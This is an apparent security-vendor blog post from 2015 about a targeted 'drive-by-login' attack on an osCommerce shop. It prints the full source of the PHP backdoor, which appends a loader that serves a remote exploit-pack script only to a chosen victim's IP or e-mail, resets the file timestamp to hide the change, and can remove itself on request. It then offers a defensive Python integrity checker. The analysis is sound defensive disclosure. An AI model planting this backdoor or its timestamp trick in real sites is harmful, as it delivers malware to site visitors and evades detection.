Drive-by-login attack: the end of safe web

Tuesday, April 7, 2015. Read time: 3 min.

In this blog post, we are going to share some interesting facts about a new vector of drive-by-download attack that we called ‘drive-by-login’.


The information security industry has been familiar with drive-by-download attacks for a dozen years already. According to Comodo, a 'drive-by-download' attack is "a malware delivery technique that is triggered simply because the user visited a website". Updated software, an installed antivirus and basic knowledge of computer security can prevent 95% of drive-by-download attacks today. The information security industry is evolving every day, bringing new products and solutions aimed at stopping known cyberattacks. Obviously, at the same time hackers are creating new attack techniques and vectors that are simple and efficient to use.


Three weeks ago, a customer, a medium-size online store from Central Europe, contacted us after noticing very strange behaviour on his website. One of his long-term clients, a respected and successful businessman, complained that the store's website had tried to infect his PC with malware. Daily malware and vulnerability scans, however, had not revealed any threats for months. The shop was running the latest osCommerce Online Merchant v2.3.4, released in June 2014. Initially we thought it was a false-positive alert; it was not.

We quickly discovered a very interesting file named ‘ozcommerz_pwner.php.bak’ in the document root. The file had the following content:

<?php

# osCommerce 2.x.x universal user pwner by Piht0z
# tested on osCommerce-2.3.4
# keep priv8 && fuck white hats

$victim_ip = "127.0.0.1";
$victim_email = "user@mail.com";
$pack = "http://host/bl.js";

# Record the target script's timestamp before modifying it (see touch() below).
$time = filectime("includes/application_bottom.php");

if (isset($_GET['del'])) {
    # ?del: strip everything from the appended "<? " block onwards, restoring the original script.
    $str = file_get_contents("includes/application_bottom.php");
    $str = preg_replace('/\<\?\s.*/ms', '', $str);
    file_put_contents("includes/application_bottom.php", $str);
} else {
    # Otherwise append a loader that serves the remote script only to the chosen visitor,
    # selected by source IP or by the e-mail address of the logged-in customer.
    file_put_contents("includes/application_bottom.php", '<?
$str = "<script src=\"' . $pack . '\"></script>";
$ip = explode(".", $_SERVER["REMOTE_ADDR"]);
if ($ip[0] . "." . $ip[1] . "." . $ip[2] . "." . $ip[3] == "' . $victim_ip . '")
    { echo $str; }
if ( is_int($_SESSION["customer_id"]) && ($_SESSION["customer_id"] > 0) ) {
    $customer_info_query = tep_db_query("select customers_email_address from "
        . TABLE_CUSTOMERS . " where customers_id = \'" . (int)$_SESSION["customer_id"] . "\'");
    $customer_info = tep_db_fetch_array($customer_info_query);
    if ($customer_info["customers_email_address"] == "' . $victim_email . '") {
        echo $str;
    }
}
?>', FILE_APPEND);
}

# Put the old timestamp back so a scanner that trusts modification dates sees nothing.
# Note that touch() can only reset mtime/atime; the kernel updates ctime on this call.
touch("includes/application_bottom.php", $time);
?>

As we can see from the comments kindly left by the hackers, it is a universal osCommerce backdoor that delivers malware to selected user(s). Whereas the drive-by-download technique targets any user who opens the link, drive-by-login targets one very specific victim and nobody else.

The backdoor patches the osCommerce script '/includes/application_bottom.php' with malicious code that loads arbitrary remote content (malware) based on the visitor's IP address or, for registered customers only, on the e-mail address in the visitor's profile. After modifying the script, the backdoor resets the timestamp of '/includes/application_bottom.php' so that the last-modification date of the script appears unchanged, as if nothing had happened. If the backdoor is called with the "?del" parameter, it restores the original content of the '/includes/application_bottom.php' script.
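Because the backdoor puts the old mtime back with touch(), a scanner that trusts modification times misses the change. The following is an added example, not code from the original post or from osCommerce: a content-hash integrity check over a web root (the kind of file-integrity monitor the post recommends), plus a check for the ctime/mtime skew that touch() cannot hide on POSIX systems. The web root, file names and file contents in demo() are constructed for the demonstration.

```python
import hashlib
import os
import tempfile
import time

def sha256_file(path):
    """Hash a file's bytes; unlike mtime, this cannot be reset by touch()."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root):
    """Baseline: POSIX-style relative path -> sha256 for every file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return baseline

def verify(root, baseline):
    """Return (modified, added, removed) paths by content, ignoring timestamps."""
    current = snapshot(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return modified, added, removed

def ctime_after_mtime(path, slack=2.0):
    """POSIX: utime()/touch cannot set ctime, so a 'restored' mtime lags far behind ctime."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > slack

def demo():
    """Constructed scenario: baseline, then append to the footer script and put the old mtime back."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "includes"))
        target = os.path.join(root, "includes", "application_bottom.php")
        with open(target, "w") as f:
            f.write("<?php\n// original footer logic (constructed)\n?>\n")
        old = time.time() - 30 * 86400          # pretend the file is a month old
        os.utime(target, (old, old))
        baseline = snapshot(root)
        with open(target, "a") as f:
            f.write("<?php echo 'appended block'; ?>\n")   # constructed modification
        os.utime(target, (old, old))            # mtime reset, as the backdoor does; ctime still moves
        return verify(root, baseline) + (ctime_after_mtime(target),)
```

In production the baseline would be stored off-host and compared on a schedule; a modified entry with an unchanged mtime is exactly the signature this backdoor leaves.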

At the moment the backdoor is not known to virustotal.com:
https://www.virustotal.com/en/file/04bf6a4fa9230d95bc97738f088e4e3d249ca599a3d7b6c10bf5b6a20720bca8/analysis/1427841867/

Our customer's '/includes/application_bottom.php' script had apparently been restored and contained no malicious code. However, we managed to recover an older version from a backup, and it contained an interesting modification:

[Figure: Backdoored version of "/includes/application_bottom.php"]

As you can imagine, both the IP address and the e-mail address belonged to the businessman who raised the alert. The remote URL loaded a popular exploit pack that targeted recent 0-day vulnerabilities in Flash.

Further investigation revealed that the osCommerce installation had been compromised via a third-party plugin that contained a serious vulnerability (which automated vulnerability scanners had missed).

The logs also revealed that, after the backdoor was removed, the entire shop database was stolen, meaning that the hackers initially targeted only the visitor and took the database as a "bonus" at the end of the operation.

Some interesting conclusions from this case and about drive-by-login in general:

  • Drive-by-login attacks may partially or even entirely replace phishing in the near future, as more and more people become aware of phishing and cannot be tricked into clicking a malicious link.
  • Drive-by-login attacks are extremely dangerous because they do not require any social engineering (as phishing attacks do): it is enough to identify one of the victim's favourite websites, compromise it and wait until the victim visits the trusted site (quite probably without any precautions, e.g. with the NoScript plugin disabled). This means that the security awareness training companies run to explain the dangers of phishing will not help to prevent drive-by-login attacks.
  • Drive-by-login attacks are very difficult for malware scanners or scanning services to detect, as the malware is delivered to the specific victim only.
  • Website owners are not ready for drive-by-login attacks: many small and medium-size e-commerce businesses think they are too small to be compromised and do not devote enough attention to web security. However, just one important visitor or client may be enough to make them a target of professional hackers.

High-Tech Bridge’s CEO, Mr. Ilia Kolochenko, comments:
We saw some similar cases of targeted attacks before; however, it is the first time we have seen a universal backdoor for a large e-commerce platform. This means that hackers have started using this vector on a regular basis to achieve their goals. We can definitely say that drive-by-login attacks will grow in the future, putting every single website and thus every single user at risk.

The only way to prevent such attacks is to have a sophisticated file-integrity monitor, to make sure that the web server is properly configured and patched, and to perform regular penetration testing of your web application even if its CMS is up to date.


High-Tech Bridge’s Chief Research Officer, Mr. Marsel Nizamutdinov, says:
Drive-by-login attacks mean that no websites are safe anymore. Any website, regardless of its size or purpose, may become the victim of a targeted and sophisticated hack. Finally, this means that no websites can be considered secure or trusted anymore. This is the beginning of the end of the safe web.

Our award-winning solution ImmuniWeb®, recently recognized as the "most advanced hybrid on-demand web penetration testing SaaS" by Frost & Sullivan research, enables SMEs to hire professional penetration testers in a few minutes and prevent the vast majority of web security risks that may turn a website into a drive-by-login weapon in the hands of virtual hitmen.


High-Tech Bridge Security Research Team regularly writes about web and mobile application security, privacy, Machine Learning and AI.

User Comments

1 response to "Drive-by-login attack: the end of safe web"

Anonymous, 2015-04-13 22:41:19 UTC:
Do you know which osCommerce add-on contained the file?